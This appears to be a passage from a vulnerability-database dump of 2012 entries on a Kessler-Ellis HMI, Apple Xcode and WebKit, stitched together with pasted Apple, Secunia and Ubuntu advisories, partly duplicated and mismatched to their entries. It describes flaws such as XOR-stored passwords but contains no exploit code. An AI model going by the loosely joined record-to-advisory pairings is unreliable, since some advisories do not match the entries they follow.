thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format
| VAR-201207-0679 | No CVE | Kessler Ellis Products Infilink HMI Unauthorized Access Vulnerability |
CVSS V2: - CVSS V3: - Severity: MEDIUM |
Kessler-Ellis is a well-known instrument manufacturer. The Infilink HMI is the Human Machine Interface (HMI) for Kessler-Ellis products. The Kessler Ellis Products Infilink HMI product failed to securely hash the authentication credentials in the project file. This product uses a simple binary XOR process to encrypt the plaintext password, allowing the attacker to simply extract the password information and control the application. Kessler-Ellis Products Infilink-HMI is prone to an unauthorized-access vulnerability.
Local attackers can exploit this issue to gain unauthorized access to the affected application. This may aid in further attacks.
Infilink-HMI 5.00.23 is vulnerable. Infilink HMI Yes Kessler-Ellis HMI of the product (HMI)
| VAR-201207-0093 | CVE-2012-3698 | Apple Xcode Vulnerable to reading keychain entries |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Apple Xcode before 4.4 does not properly compose a designated requirement (DR) during signing of programs that lack bundle identifiers, which allows remote attackers to read keychain entries via a crafted app, as demonstrated by the keychain entries of a (1) helper tool or (2) command-line tool. Apple Xcode Specifies the requirements specified when signing programs that do not have a bundle identifier. (DR) Vulnerabilities exist that allow keychain entries to be read because of improperly configured.A third party may be able to read the keychain entry through a crafted application. Apple Xcode is prone to an information-disclosure vulnerability.
Attackers can leverage this issue to gain access to sensitive information. Information obtained may aid in further attacks. For example keychain entries for (1) accessibility tools or (2) command line tools. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2012-07-25-2 Xcode 4.4
Xcode 4.4 is now available and addresses the following:
neon
Available for: OS X Lion v10.7.4 and later
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of SSL
3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode.
The neon library (used by Subversion) disabled the 'empty fragment'
countermeasure which prevented these attacks. This issue is addressed
by enabling the countermeasure. When a Developer ID was used
with Xcode to sign a product that did not have a bundle identifier,
such as a command-line tool or an embedded helper, the generated DR
for the product did not include the developer's ID in the part of the
DR that applies to apps signed by the App Store. As a result, any App
Store app may have accessed keychain items created by the product.
This is addressed by generating a DR with improved checks. Affected
products need to be re-signed with this version of Xcode to include
the improved DR.
CVE-ID
CVE-2012-3698
Xcode 4.4 may be obtained from the Downloads section of the
Apple Developer Connection Member site: http://developer.apple.com/
Login is required, and membership is free.
Xcode 4.4 is also available from the App Store. It is free to anyone
with OS X 10.7.x Lion and later.
The download file is named: "xcode446938108a.dmg"
Its SHA-1 digest is: d04393543564f85c2f4d82e507d596d3070e9aba
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.18 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJQDy5fAAoJEPefwLHPlZEwWasP/iuE4F9PkoV01YyZlBeoQ/qE
zn62KshgNUkVq0TPe/leKG0UXWxYsPQQy1+KC9o7ULnGZWrQLexO7ZySz3eImbIW
VdPXslMzEbk3YiRi/syeo16IwZheMqatKTS47NTG5xREg17vos889xbqxML4ijNN
4IysAFqewbG1qdvu35RkO4uhxO/+6pLiXjkQx/z21ml8S3ZZNnPxCE/9sGWqIJ7R
pO/9+hIecX05wtSUCkqfARZxObSDs0VTQZUak+8fKAF8k5aNY8GdnMrxNBCX9vkU
hHgLTQ4lXaqSv2UEhbkjaZuLHHNFkNINf1pbABDWASiATP0wSLVFYM3KabMqid8I
WS4b3aplqi5GqOHqRWOTtbSTsPJC73DF1PrHlvPZm7WYQmIrF6DPIlmIfK058Fqp
QRpz3H1cZwFf2B/oS4VGwtqjj606lRn7En3psMRlCyKSTdUYPd5dzCIyg8CNlpuy
9AAKEU6fhY2JCEm+2LtqdBZI+WvCET50hD9ZEzkq/2m/sazASJ5W9VtH1JzFHm9N
RvE4NS6k/u6BLU2zsUiqJ/cyVGMV7RF3gIEi+NXAShFNHfavDPgoTN2MPkeT3V0C
sa6X/O3dn4F9PFJZvqKyHKeBRI0lV3PSgKP/xC/K+cD/YraFFFvUn7XoVZ2A8uPW
bYcdpG4AJaNdEGZY71xq
=OWIG
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Apple Xcode Two Vulnerabilities
SECUNIA ADVISORY ID:
SA50068
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50068/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50068
RELEASE DATE:
2012-07-26
DISCUSS ADVISORY:
http://secunia.com/advisories/50068/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50068/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50068
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A weakness and a vulnerability have been reported in Apple Xcode,
which can be exploited by malicious people to disclose potentially
sensitive information, hijack a user's session, and bypass certain
security restrictions.
1) A design error exists within the implementation of SSL 3.0 and TLS
1.0 protocols.
The weakness and the vulnerability are reported in versions prior to
4.4.
SOLUTION:
Update to version 4.4 via the Apple Developer site or via the App
Store.
PROVIDED AND/OR DISCOVERED BY:
2) Reported by the vendor.
ORIGINAL ADVISORY:
APPLE-SA-2012-07-25-2:
http://support.apple.com/kb/HT5416
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201209-0256 | CVE-2012-3598 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. WebKit is prone to multiple unspecified remote code-execution vulnerabilities.
Attackers can exploit these issues by performing a man-in-the-middle attack. Successful attacks will result in arbitrary code execution; failed attacks may cause denial-of-service conditions.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. WebKit is a set of open source web browser engines jointly developed by companies such as KDE, Apple (Apple), and Google (Google), and is currently used by browsers such as Apple Safari and Google Chrome. ============================================================================
Ubuntu Security Notice USN-1617-1
October 25, 2012
webkit vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
Summary:
Multiple security vulnerabilities were fixed in WebKit.
Software Description:
- webkit: Web content engine library for GTK+
Details:
A large number of security issues were discovered in the WebKit browser and
JavaScript engines.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.04 LTS:
libjavascriptcoregtk-1.0-0 1.8.3-0ubuntu0.12.04.1
libjavascriptcoregtk-3.0-0 1.8.3-0ubuntu0.12.04.1
libwebkitgtk-1.0-0 1.8.3-0ubuntu0.12.04.1
libwebkitgtk-3.0-0 1.8.3-0ubuntu0.12.04.1
After a standard system update you need to restart your session to make all
the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2012-09-19-3 Safari 6.0.1
Safari 6.0.1 is now available and addresses the following:
Safari
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 and v10.8.1
Impact: Opening a maliciously crafted downloaded HTML document may
lead to the disclosure of local file content
Description: In OS X Mountain Lion HTML files were removed from the
unsafe type list. Quarantined HTML documents are opened in a safe
mode that prevents accessing other local or remote resources. A logic
error in Safari's handling of the Quarantine attribute caused the
safe mode not to be triggered on Quarantined files. This issue was
addressed by properly detecting the existence of the Quarantine
attribute.
CVE-ID
CVE-2012-3713 : Aaron Sigel of vtty.com, Masahiro Yamada
Safari
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 and v10.8.1
Impact: Using Autofill on a maliciously crafted website may lead to
the disclosure of contact information
Description: A rare condition existed in the handling of Form
Autofill. Using Form Autofill on a maliciously crafted website may
have led to disclosure of information from the Address Book "Me" card
that was not included in the Autofill popover. This issue was
addressed by limiting Autofill to the fields contained in the
popover.
CVE-ID
CVE-2012-3714 : Jonathan Hogervorst of Buzzera
Safari
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 and v10.8.1
Impact: After editing a HTTPS URL in the address bar, a request may
be unexpectedly sent over HTTP
Description: A logic issue existed in the handling of HTTPS URLs in
the address bar. If a portion of the address was edited by pasting
text, the request may be unexpectedly sent over HTTP. This issue was
addressed by improved handling of HTTPS URLs.
CVE-ID
CVE-2012-3715 : Aaron Rhoads of East Watch Services LLC, Pepi
Zawodsky
WebKit
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 and v10.8.1
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2011-3105 : miaubiz
CVE-2012-2817 : miaubiz
CVE-2012-2818 : miaubiz
CVE-2012-2829 : miaubiz
CVE-2012-2831 : miaubiz
CVE-2012-2842 : miaubiz
CVE-2012-2843 : miaubiz
CVE-2012-3598 : Apple Product Security
CVE-2012-3601 : Martin Barbella of the Google Chrome Security Team
using AddressSanitizer
CVE-2012-3602 : miaubiz
CVE-2012-3606 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3607 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3612 : Skylined of the Google Chrome Security Team
CVE-2012-3613 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3614 : Yong Li of Research In Motion, Inc.
CVE-2012-3616 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3617 : Apple Product Security
CVE-2012-3621 : Skylined of the Google Chrome Security Team
CVE-2012-3622 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3623 : Skylined of the Google Chrome Security Team
CVE-2012-3624 : Skylined of the Google Chrome Security Team
CVE-2012-3632 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3643 : Skylined of the Google Chrome Security Team
CVE-2012-3647 : Skylined of the Google Chrome Security Team
CVE-2012-3648 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3649 : Dominic Cooney of Google and Martin Barbella of the
Google Chrome Security Team
CVE-2012-3651 : Abhishek Arya and Martin Barbella of the Google
Chrome Security Team
CVE-2012-3652 : Martin Barbella of Google Chrome Security Team
CVE-2012-3654 : Skylined of the Google Chrome Security Team
CVE-2012-3657 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3658 : Apple
CVE-2012-3659 : Mario Gomes of netfuzzer.blogspot.com, Abhishek Arya
(Inferno) of the Google Chrome Security Team
CVE-2012-3660 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3671 : Skylined and Martin Barbella of the Google Chrome
Security Team
CVE-2012-3672 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3673 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3675 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3676 : Julien Chaffraix of the Chromium development
community
CVE-2012-3677 : Apple
CVE-2012-3684 : kuzzcc
CVE-2012-3685 : Apple Product Security
CVE-2012-3687 : kuzzcc
CVE-2012-3688 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3692 : Skylined of the Google Chrome Security Team, Apple
Product Security
CVE-2012-3699 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3700 : Apple Product Security
CVE-2012-3701 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3702 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3703 : Apple Product Security
CVE-2012-3704 : Skylined of the Google Chrome Security Team
CVE-2012-3705 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3706 : Apple Product Security
CVE-2012-3707 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3708 : Apple
CVE-2012-3709 : Apple Product Security
CVE-2012-3710 : James Robinson of Google
CVE-2012-3711 : Skylined of the Google Chrome Security Team
CVE-2012-3712 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
For OS X Lion systems Safari 6.0.1 is available via the Apple
Software Update application.
For OS X Mountain Lion systems, Safari 6.0.1 is included with
OS X v10.8.2.
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJQWho/AAoJEPefwLHPlZEwG9kP/A2FKYpkYoEnaHSaCeI8W/Gt
F+EjtnJ85SnVz76a81dt7O+F65pYMjMYEEHthgw62JAbZHrw93gf1dWpp+0IfXJZ
w/dOV6yNxYmDOh0zir1I2tCIplkD2MvUrubcW+UCwDbVxnGKsTNBWzovHpvos2Uk
lRn6Bl1wM5vOthJO14Z6iS0XX4GkefA3XzoVqY6dU0c9mxrTQhtMWvL+Pb1UpqX3
CZLcMmFGRuCE/+aM+d1x749PEteNDbrnw/aYfMyMSUNgb43EaUxCzTiUU+NvzsFL
Ah33i29Li38nl+rLVgTRRU9EQVm1ZcujoftpgFw9prTd999f47eCSU5/QeDjY+Zw
GLJRDfe/PP/GFKzAchefqS5x2PFUI9hZRGJEFviOEygfEPfYVCe/r/iMvBTtwfkn
GVw1WIXcraqxXGzUNhCCZy3rcA8sSbJlCaIIr3VbtPS7PMHwjSaT+DBgD0hWtnk2
uATTye1UKG8m+FfwXn7ha3/W0kmdEGn1dBgpG2d35yXkGj7zgUgi4MX9HTVGTqEd
Nvlzpffv5LCCdDqhRgqe4uT7fKmb46owoNNHM4eAH4A4EwHzA3lXQt5twhO9b2gL
gWZ+bfwxfUaVlyBDPM1cUZ4e13HRiFPiRI9PJ2S5DrLoiMzpXIbBRH+5fs9uVvV+
zhJ+1dokzSpzRKJOq68N
=xYhU
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released.
Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
----------------------------------------------------------------------
TITLE:
Apple iTunes Multiple WebKit Vulnerabilities
SECUNIA ADVISORY ID:
SA50618
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50618/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50618
RELEASE DATE:
2012-09-13
DISCUSS ADVISORY:
http://secunia.com/advisories/50618/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50618/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50618
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Apple iTunes, which
can be exploited by malicious people to compromise a user's system. No
further information is currently available.
For more information
SA47231
SA47694
SA47938
SA48016
SA48265
SA48274
SA48512
SA48618
SA48732
SA48992
SA49194
SA49277
SA49724
SA49906
SA50058
The vulnerabilities are reported in versions prior to 10.7.
SOLUTION:
Update to version 10.7.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor.
ORIGINAL ADVISORY:
APPLE-SA-2012-09-12-1:
http://lists.apple.com/archives/security-announce/2012/Sep/msg00001.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0490 | CVE-2012-0683 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. WebKit is prone to multiple unspecified remote code-execution vulnerabilities.
Attackers can exploit these issues by performing a man-in-the-middle attack. Successful attacks will result in arbitrary code execution; failed attacks may cause denial-of-service conditions.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems. Vulnerabilities exist in using WebKit in versions prior to Apple Safari 6.0. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2012-09-24-1 Apple TV 5.1
Apple TV 5.1 is now available and addresses the following:
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: An uninitialized memory access existed in the handling
of Sorenson encoded movie files. This issue was addressed through
improved memory initialization.
CVE-ID
CVE-2012-3722 : Will Dormann of the CERT/CC
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A malicious Wi-Fi network may be able to determine networks
a device has previously accessed
Description: Upon connecting to a Wi-Fi network, iOS may broadcast
MAC addresses of previously accessed networks per the DNAv4
protocol. This issue was addressed by disabling DNAv4 on unencrypted
Wi-Fi networks
CVE-ID
CVE-2012-3725 : Mark Wuergler of Immunity, Inc.
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of
ThunderScan encoded TIFF images. This issue was addressed by updating
libtiff to version 3.9.5.
CVE-ID
CVE-2011-1167
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted PNG image may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in libpng's
handling of PNG images. These issues were addressed through improved
validation of PNG images.
CVE-ID
CVE-2011-3026 : Juri Aedla
CVE-2011-3048
CVE-2011-3328
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted JPEG image may lead to an
unexpected application termination or arbitrary code execution
Description: A double free issue existed in ImageIO's handling of
JPEG images. This issue was addressed through improved memory
management.
CVE-ID
CVE-2012-3726 : Phil of PKJE Consulting
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF image may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow issue existed in libTIFF's handling
of TIFF images. This issue was addressed through improved validation
of TIFF images. This issue does not affect OS X Mountain Lion
systems.
CVE-ID
CVE-2012-1173
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Applications that use ICU may be vulnerable to an unexpected
application termination or arbitrary code execution
Description: A stack buffer overflow existed in the handling of ICU
locale IDs. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2011-4599
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with a privileged network position may cause an
unexpected application termination or arbitrary code execution
Description: Multiple vulnerabilities existed in libxml, the most
serious of which may lead to an unexpected application termination or
arbitrary code execution. These issues were addressed by applying the
relevant upstream patches.
CVE-ID
CVE-2011-1944 : Chris Evans of Google Chrome Security Team
CVE-2011-2821 : Yang Dingning of NCNIPC, Graduate University of
Chinese Academy of Sciences
CVE-2011-2834 : Yang Dingning of NCNIPC, Graduate University of
Chinese Academy of Sciences
CVE-2011-3919 : Juri Aedla
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with a privileged network position may cause an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in
JavaScriptCore. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2012-0682 : Apple Product Security
CVE-2012-0683 : Dave Mandelin of Mozilla
CVE-2012-3589 : Dave Mandelin of Mozilla
CVE-2012-3590 : Apple Product Security
CVE-2012-3591 : Apple Product Security
CVE-2012-3592 : Apple Product Security
CVE-2012-3678 : Apple Product Security
CVE-2012-3679 : Chris Leary of Mozilla
Installation note:
Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting
"Settings -> General -> Update Software".
To check the current version of software, select
"Settings -> General -> About".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJQXO50AAoJEPefwLHPlZEwc40P/AmBKys+PAsdT8gGrSpOY1B9
8h+Y0xdE+Hmesq9D4p6wvdY/lR+zMqtSwT6amNImYCIaRmm1P8+r8n31be52TYlg
7GqEAZbDtFztHwIISC8Khf8dMvWSrLhzRa7X/cxlIgRKmoXFnqJZzYcUov/M9Uw8
KwejQnztmAx7srHnZCNI+dxFqAC7hPoegnDnlVPx1DkwKDjt8q9xD3PGQyiGWWkI
wqUEWvMGWr65CFyA7R0hDqKuNCowWn2cKP1UhIoEur5yRmc4aQVtOnHhJ8k9mdoO
+58JC/y8lCtqGUyEL2Ar0FmIcRX/GJf+/isKOtmHx0JuEhH5beQ6s9FxU5eNR9DH
EVPmVXowY9wMvKxwHFU3jwq8kQ3+IYC+7KA6lScb5mXO5mC5dbJPLp7uJto7+VtI
atgQmvzdB8G562wpwTPuA4UQWWr0i6WWl8zkfgkRHO+cXyN683rkBP/vVEo9FipR
YkQ10RsXqYDRXBcRywmTZZwQy6txMtV9D2bnk1uukQHBsZh30/mEpcmZbo6CO3s3
mnOtu5D2OQsNt4MqbviUkEgdc9JIJnqAOo+9YguDCEu6Rd7unbKB3RpmD+A3OJnR
GhEa2Gqyvm/ozfb2D4L01y4UQo7dMLw+t/FOZXkrpdLlWn2LANWvXDCPSzIFCKoN
cXF+ij425pfY+d7Iekz3
=PSL+
-----END PGP SIGNATURE-----
| VAR-201207-0489 | CVE-2012-0682 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. WebKit is prone to multiple unspecified remote code-execution vulnerabilities.
Attackers can exploit these issues by performing a man-in-the-middle attack. Successful attacks will result in arbitrary code execution; failed attacks may cause denial-of-service conditions.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems. Vulnerabilities exist in using WebKit in versions prior to Apple Safari 6.0. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2012-09-24-1 Apple TV 5.1
Apple TV 5.1 is now available and addresses the following:
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: An uninitialized memory access existed in the handling
of Sorenson encoded movie files. This issue was addressed through
improved memory initialization.
CVE-ID
CVE-2012-3722 : Will Dormann of the CERT/CC
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A malicious Wi-Fi network may be able to determine networks
a device has previously accessed
Description: Upon connecting to a Wi-Fi network, iOS may broadcast
MAC addresses of previously accessed networks per the DNAv4
protocol. This issue was addressed by disabling DNAv4 on unencrypted
Wi-Fi networks
CVE-ID
CVE-2012-3725 : Mark Wuergler of Immunity, Inc.
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of
ThunderScan encoded TIFF images. This issue was addressed by updating
libtiff to version 3.9.5.
CVE-ID
CVE-2011-1167
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted PNG image may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in libpng's
handling of PNG images. These issues were addressed through improved
validation of PNG images.
CVE-ID
CVE-2011-3026 : Juri Aedla
CVE-2011-3048
CVE-2011-3328
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted JPEG image may lead to an
unexpected application termination or arbitrary code execution
Description: A double free issue existed in ImageIO's handling of
JPEG images. This issue was addressed through improved memory
management.
CVE-ID
CVE-2012-3726 : Phil of PKJE Consulting
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF image may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow issue existed in libTIFF's handling
of TIFF images. This issue was addressed through improved validation
of TIFF images. This issue does not affect OS X Mountain Lion
systems.
CVE-ID
CVE-2012-1173
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Applications that use ICU may be vulnerable to an unexpected
application termination or arbitrary code execution
Description: A stack buffer overflow existed in the handling of ICU
locale IDs. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2011-4599
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with a privileged network position may cause an
unexpected application termination or arbitrary code execution
Description: Multiple vulnerabilities existed in libxml, the most
serious of which may lead to an unexpected application termination or
arbitrary code execution. These issues were addressed by applying the
relevant upstream patches.
CVE-ID
CVE-2011-1944 : Chris Evans of Google Chrome Security Team
CVE-2011-2821 : Yang Dingning of NCNIPC, Graduate University of
Chinese Academy of Sciences
